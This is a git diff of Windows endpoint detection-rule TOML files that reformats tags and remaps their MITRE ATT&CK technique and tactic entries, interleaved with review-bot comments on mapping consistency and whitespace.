@@ creation_date = "2020/08/19" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [transform] [[transform.osquery]] 
@@ -102,7 +102,20 @@ This rule looks for the creation of executable files done by system-critical pro risk_score = 73 rule_id = "e94262f2-c1e9-4d3f-a907-aeab16712e1a" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -123,26 +136,26 @@ file where host.os.type == "windows" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" +id = "T1211" +name = "Exploitation for Defense Evasion" +reference = "https://attack.mitre.org/techniques/T1211/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + 
diff --git a/rules/windows/defense_evasion_unsigned_dll_loaded_from_suspdir.toml b/rules/windows/defense_evasion_unsigned_dll_loaded_from_suspdir.toml index 8202a95a100..0828b1440b9 100644 --- a/rules/windows/defense_evasion_unsigned_dll_loaded_from_suspdir.toml +++ b/rules/windows/defense_evasion_unsigned_dll_loaded_from_suspdir.toml @@ -2,7 +2,7 @@ creation_date = "2022/11/22" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic"] @@ -165,18 +165,29 @@ library where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.001" +name = "Invalid Code Signature" +reference = "https://attack.mitre.org/techniques/T1036/001/" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" - [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_untrusted_driver_loaded.toml b/rules/windows/defense_evasion_untrusted_driver_loaded.toml index 3d950d40f57..c9a0df30ca0 100644 --- a/rules/windows/defense_evasion_untrusted_driver_loaded.toml +++ b/rules/windows/defense_evasion_untrusted_driver_loaded.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/27" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/04" [transform] [[transform.osquery]] 
@@ -119,18 +119,19 @@ driver where host.os.type == "windows" and process.pid == 4 and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1553" -name = "Subvert Trust Controls" -reference = "https://attack.mitre.org/techniques/T1553/" - +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" [[rule.threat.technique.subtechnique]] -id = "T1553.006" -name = "Code Signing Policy Modification" -reference = "https://attack.mitre.org/techniques/T1553/006/" +id = "T1036.001" +name = "Invalid Code Signature" +reference = "https://attack.mitre.org/techniques/T1036/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml b/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml index 0ad876a1e83..ef3d4c6c627 100644 --- a/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml +++ b/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/28" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/28" [rule] author = ["Elastic"] @@ -62,7 +62,16 @@ references = [ risk_score = 47 rule_id = "c7894234-7814-44c2-92a9-f7d851ea246a" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide", "Data Source: SentinelOne"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Resources: Investigation Guide", + "Data Source: SentinelOne", +] type = "eql" query = ''' 
@@ -79,26 +88,14 @@ sequence by host.id, process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml b/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml index 73a80fd10f8..f2db06b1ae8 100644 --- a/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml +++ b/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/28" [rule] author = ["Elastic"] 
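Review bot: The dllhost network-connection rule drops its T1071 Application Layer Protocol entry and the `Tactic: Command and Control` tag, while the sibling rundll32 rule in the next section (`@@ -93,31 +93,36 @@`) keeps T1071 and adds T1071.001 Web Protocols. Both are `sequence by host.id, process.entity_id with maxspan=1m` detections of a system binary making an outbound connection, so the C2 mapping should be decided the same way for both; if the connection leg is still in the dllhost query (outside the hunk), restore the `[[rule.threat]]` block for TA0011 and its tag. Otherwise the description should explain why the two rules now diverge.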
@@ -93,31 +93,36 @@ sequence by host.id, process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [[rule.threat.technique.subtechnique]] id = "T1218.011" name = "Rundll32" reference = "https://attack.mitre.org/techniques/T1218/011/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + + + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/windows/defense_evasion_unusual_process_network_connection.toml b/rules/windows/defense_evasion_unusual_process_network_connection.toml index 89a760e9d11..8dd19e5c315 100644 --- a/rules/windows/defense_evasion_unusual_process_network_connection.toml +++ b/rules/windows/defense_evasion_unusual_process_network_connection.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] 
@@ -95,33 +95,14 @@ sequence by process.entity_id [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" -[[rule.threat.technique.subtechnique]] -id = "T1127.002" -name = "ClickOnce" -reference = "https://attack.mitre.org/techniques/T1127/002/" - -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.003" -name = "CMSTP" -reference = "https://attack.mitre.org/techniques/T1218/003/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.008" -name = "Odbcconf" -reference = "https://attack.mitre.org/techniques/T1218/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_wdac_policy_by_unusual_process.toml b/rules/windows/defense_evasion_wdac_policy_by_unusual_process.toml index 83c9d170fec..236dce5f9bd 100644 --- a/rules/windows/defense_evasion_wdac_policy_by_unusual_process.toml +++ b/rules/windows/defense_evasion_wdac_policy_by_unusual_process.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/28" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] 
@@ -91,18 +91,14 @@ file where host.os.type == "windows" and event.action != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_wsl_bash_exec.toml b/rules/windows/defense_evasion_wsl_bash_exec.toml index 5e040493bbb..f0dae674a7e 100644 --- a/rules/windows/defense_evasion_wsl_bash_exec.toml +++ b/rules/windows/defense_evasion_wsl_bash_exec.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/13" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -64,7 +64,19 @@ references = [ risk_score = 21 rule_id = "3e0eeb75-16e8-4f2f-9826-62461ca128b7" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -91,18 +103,31 @@ process where host.os.type == "windows" and event.type : "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1202" +name = "Indirect Command Execution" +reference = "https://attack.mitre.org/techniques/T1202/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_wsl_enabled_via_dism.toml b/rules/windows/defense_evasion_wsl_enabled_via_dism.toml index 2c23fc934b5..3fbc2682614 100644 --- a/rules/windows/defense_evasion_wsl_enabled_via_dism.toml +++ b/rules/windows/defense_evasion_wsl_enabled_via_dism.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/13" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -89,3 +89,16 @@ process where host.os.type == "windows" and event.type : "start" and ''' +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1202" +name = "Indirect Command Execution" +reference = "https://attack.mitre.org/techniques/T1202/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_wsl_kalilinux.toml b/rules/windows/defense_evasion_wsl_kalilinux.toml index 9c6fefe207c..1d34d559fbf 100644 --- a/rules/windows/defense_evasion_wsl_kalilinux.toml 
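Review bot: The `@@ -89,3 +89,16 @@` hunk gives `defense_evasion_wsl_enabled_via_dism.toml` its first `[[rule.threat]]` block (T1202, TA0005 Defense Evasion), but that file section has no hunk touching `tags`, so if the rule's tag list does not already contain `Tactic: Defense Evasion` the tags and threat sections now disagree, which a tactic-to-tag consistency check would report. Please confirm the existing tag line or add `"Tactic: Defense Evasion",` alongside this change. In the preceding wsl_bash_exec hunk the new tag order is `"Tactic: Execution", "Tactic: Defense Evasion"` while its threat blocks list Defense Evasion first, and the other multi-tactic files in this chunk order the tactic tags the same way as their threat blocks; aligning the order keeps the rule set uniform.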
+++ b/rules/windows/defense_evasion_wsl_kalilinux.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/12" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/28" [rule] author = ["Elastic"] @@ -63,7 +63,20 @@ references = ["https://learn.microsoft.com/en-us/windows/wsl/wsl-config"] risk_score = 73 rule_id = "dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -87,36 +100,14 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1564" -name = "Hide Artifacts" -reference = "https://attack.mitre.org/techniques/T1564/" +id = "T1202" +name = "Indirect Command Execution" +reference = "https://attack.mitre.org/techniques/T1202/" -[[rule.threat.technique.subtechnique]] -id = "T1564.006" -name = "Run Virtual Instance" -reference = "https://attack.mitre.org/techniques/T1564/006/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_wsl_registry_modification.toml b/rules/windows/defense_evasion_wsl_registry_modification.toml index aaf9f735f05..ca02fcc756a 100644 --- a/rules/windows/defense_evasion_wsl_registry_modification.toml +++ b/rules/windows/defense_evasion_wsl_registry_modification.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/12" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] 
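Review bot: The Kali-under-WSL rule replaces T1564.006 Run Virtual Instance with T1202 Indirect Command Execution and deletes the Execution block (T1059.004 Unix Shell, TA0002) together with the `Tactic: Execution` tag, while the sibling wsl_bash_exec rule earlier in this chunk adds T1202 and keeps T1059.004. Both are process-start rules on WSL shells, so they should map consistently, and running a full Linux distribution inside WSL is arguably closer to the virtual-instance sub-technique that was removed than to indirect command execution. If the narrower mapping is deliberate, the rule description (outside the hunk) should be updated to match.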
@@ -90,13 +90,19 @@ registry where host.os.type == "windows" and event.type == "change" and registry
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1112"
 name = "Modify Registry"
 reference = "https://attack.mitre.org/techniques/T1112/"
+[[rule.threat.technique]]
+id = "T1202"
+name = "Indirect Command Execution"
+reference = "https://attack.mitre.org/techniques/T1202/"
+
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
diff --git a/rules/windows/discovery_active_directory_webservice.toml b/rules/windows/discovery_active_directory_webservice.toml
index 8f2800ee80d..56600c5238b 100644
--- a/rules/windows/discovery_active_directory_webservice.toml
+++ b/rules/windows/discovery_active_directory_webservice.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/01/31"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/01/15"
 [rule]
 author = ["Elastic"]
@@ -83,18 +83,14 @@ Active Directory Web Service (ADWS) facilitates querying Active Directory (AD) o
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1018"
 name = "Remote System Discovery"
 reference = "https://attack.mitre.org/techniques/T1018/"
-[[rule.threat.technique]]
-id = "T1087"
-name = "Account Discovery"
-reference = "https://attack.mitre.org/techniques/T1087/"
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+
diff --git a/rules/windows/discovery_ad_explorer_execution.toml b/rules/windows/discovery_ad_explorer_execution.toml
index 7b4a261ca72..52e76151aca 100644
--- a/rules/windows/discovery_ad_explorer_execution.toml
+++ b/rules/windows/discovery_ad_explorer_execution.toml
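Review bot: The new-side whitespace in the `@@ -90,13 +90,19 @@` hunk is irregular: the blank line between `framework` and `[[rule.threat.technique]]` is removed, two blank `+` lines are stacked before `[rule.threat.tactic]`, and a blank line is appended at end of file. The same pattern (no blank before `[[rule.threat.technique.subtechnique]]`, two or three blanks before `[rule.threat.tactic]`, a trailing blank at EOF) recurs in most files of this chunk, which reads like generated output rather than the one-blank-line-between-tables layout the removed side kept. A normalization pass (single blank line between tables, single trailing newline) before committing would confine the diff to the intended tag and mapping changes.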
@@ -2,7 +2,7 @@
 creation_date = "2025/09/01"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/09/01"
 [rule]
 author = ["Elastic"]
@@ -83,33 +83,44 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1016"
+name = "System Network Configuration Discovery"
+reference = "https://attack.mitre.org/techniques/T1016/"
+
+[[rule.threat.technique]]
+id = "T1018"
+name = "Remote System Discovery"
+reference = "https://attack.mitre.org/techniques/T1018/"
 [[rule.threat.technique]]
 id = "T1069"
 name = "Permission Groups Discovery"
 reference = "https://attack.mitre.org/techniques/T1069/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1069.002"
 name = "Domain Groups"
 reference = "https://attack.mitre.org/techniques/T1069/002/"
+
 [[rule.threat.technique]]
 id = "T1087"
 name = "Account Discovery"
 reference = "https://attack.mitre.org/techniques/T1087/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1087.002"
 name = "Domain Account"
 reference = "https://attack.mitre.org/techniques/T1087/002/"
+
 [[rule.threat.technique]]
 id = "T1482"
 name = "Domain Trust Discovery"
 reference = "https://attack.mitre.org/techniques/T1482/"
+
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+
diff --git a/rules/windows/discovery_adfind_command_activity.toml b/rules/windows/discovery_adfind_command_activity.toml
index eb934734102..154f036722d 100644
--- a/rules/windows/discovery_adfind_command_activity.toml
+++ b/rules/windows/discovery_adfind_command_activity.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/10/19"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [rule]
 author = ["Elastic"]
@@ -104,6 +104,10 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1016"
+name = "System Network Configuration Discovery"
+reference = "https://attack.mitre.org/techniques/T1016/"
 [[rule.threat.technique]]
 id = "T1018"
@@ -114,28 +118,30 @@ reference = "https://attack.mitre.org/techniques/T1018/"
 id = "T1069"
 name = "Permission Groups Discovery"
 reference = "https://attack.mitre.org/techniques/T1069/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1069.002"
 name = "Domain Groups"
 reference = "https://attack.mitre.org/techniques/T1069/002/"
+
 [[rule.threat.technique]]
 id = "T1087"
 name = "Account Discovery"
 reference = "https://attack.mitre.org/techniques/T1087/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1087.002"
 name = "Domain Account"
 reference = "https://attack.mitre.org/techniques/T1087/002/"
+
 [[rule.threat.technique]]
 id = "T1482"
 name = "Domain Trust Discovery"
 reference = "https://attack.mitre.org/techniques/T1482/"
+
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+
diff --git a/rules/windows/discovery_command_system_account.toml b/rules/windows/discovery_command_system_account.toml
index 98ab72dd698..03d5ecdf531 100644
--- a/rules/windows/discovery_command_system_account.toml
+++ b/rules/windows/discovery_command_system_account.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/03/18"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/05/20"
 [rule]
 author = ["Elastic"]
@@ -55,7 +55,16 @@ Hence for this rule to work effectively, users will need to add a custom ingest
 For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html
 """
 severity = "low"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Discovery",
+ "Tactic: Privilege Escalation",
+ "Resources: Investigation Guide",
+ "Data Source: Elastic Defend",
+ "Data Source: Sysmon",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -87,18 +96,31 @@ not (process.parent.name : "cmd.exe" and process.working_directory : "C:\\Progra
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1033"
 name = "System Owner/User Discovery"
 reference = "https://attack.mitre.org/techniques/T1033/"
-[[rule.threat.technique]]
-id = "T1087"
-name = "Account Discovery"
-reference = "https://attack.mitre.org/techniques/T1087/"
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+[[rule.threat.technique.subtechnique]]
+id = "T1078.003"
+name = "Local Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/003/"
+
+
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
+
diff --git a/rules/windows/discovery_enumerating_domain_trusts_via_dsquery.toml b/rules/windows/discovery_enumerating_domain_trusts_via_dsquery.toml
index ef606a7f6e7..885e2d7cfcf 100644
--- a/rules/windows/discovery_enumerating_domain_trusts_via_dsquery.toml
+++ b/rules/windows/discovery_enumerating_domain_trusts_via_dsquery.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/01/27"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [rule]
 author = ["Elastic"]
@@ -93,13 +93,19 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1018"
+name = "Remote System Discovery"
+reference = "https://attack.mitre.org/techniques/T1018/"
 [[rule.threat.technique]]
 id = "T1482"
 name = "Domain Trust Discovery"
 reference = "https://attack.mitre.org/techniques/T1482/"
+
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+
diff --git a/rules/windows/discovery_high_number_ad_properties.toml b/rules/windows/discovery_high_number_ad_properties.toml
index 9bb71b502f5..ba1b6f16be2 100644
--- a/rules/windows/discovery_high_number_ad_properties.toml
+++ b/rules/windows/discovery_high_number_ad_properties.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/01/29"
 integration = ["windows", "system"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/11/14"
 [rule]
 author = ["Elastic"]
@@ -85,28 +85,14 @@ any where host.os.type == "windows" and event.code == "4662" and not winlog.even
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1069"
 name = "Permission Groups Discovery"
 reference = "https://attack.mitre.org/techniques/T1069/"
-[[rule.threat.technique.subtechnique]]
-id = "T1069.002"
-name = "Domain Groups"
-reference = "https://attack.mitre.org/techniques/T1069/002/"
-
-[[rule.threat.technique]]
-id = "T1087"
-name = "Account Discovery"
-reference = "https://attack.mitre.org/techniques/T1087/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1087.002"
-name = "Domain Account"
-reference = "https://attack.mitre.org/techniques/T1087/002/"
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+
diff --git a/rules/windows/discovery_host_public_ip_address_lookup.toml b/rules/windows/discovery_host_public_ip_address_lookup.toml
index 5db11daaac7..70ce393aac1 100644
--- a/rules/windows/discovery_host_public_ip_address_lookup.toml
+++ b/rules/windows/discovery_host_public_ip_address_lookup.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/08/20"
 integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/09/11"
 [rule]
 author = ["Elastic"]
@@ -55,7 +55,19 @@ references = ["https://attack.mitre.org/techniques/T1016/"]
 risk_score = 73
 rule_id = "642ce354-4252-4d43-80c9-6603f16571c1"
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Data Source: Sysmon"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Discovery",
+ "Tactic: Command and Control",
+ "Resources: Investigation Guide",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: SentinelOne",
+ "Data Source: Crowdstrike",
+ "Data Source: Sysmon",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -119,18 +131,31 @@ network where host.os.type == "windows" and dns.question.name != null and proces
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1016"
 name = "System Network Configuration Discovery"
 reference = "https://attack.mitre.org/techniques/T1016/"
-[[rule.threat.technique.subtechnique]]
-id = "T1016.001"
-name = "Internet Connection Discovery"
-reference = "https://attack.mitre.org/techniques/T1016/001/"
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
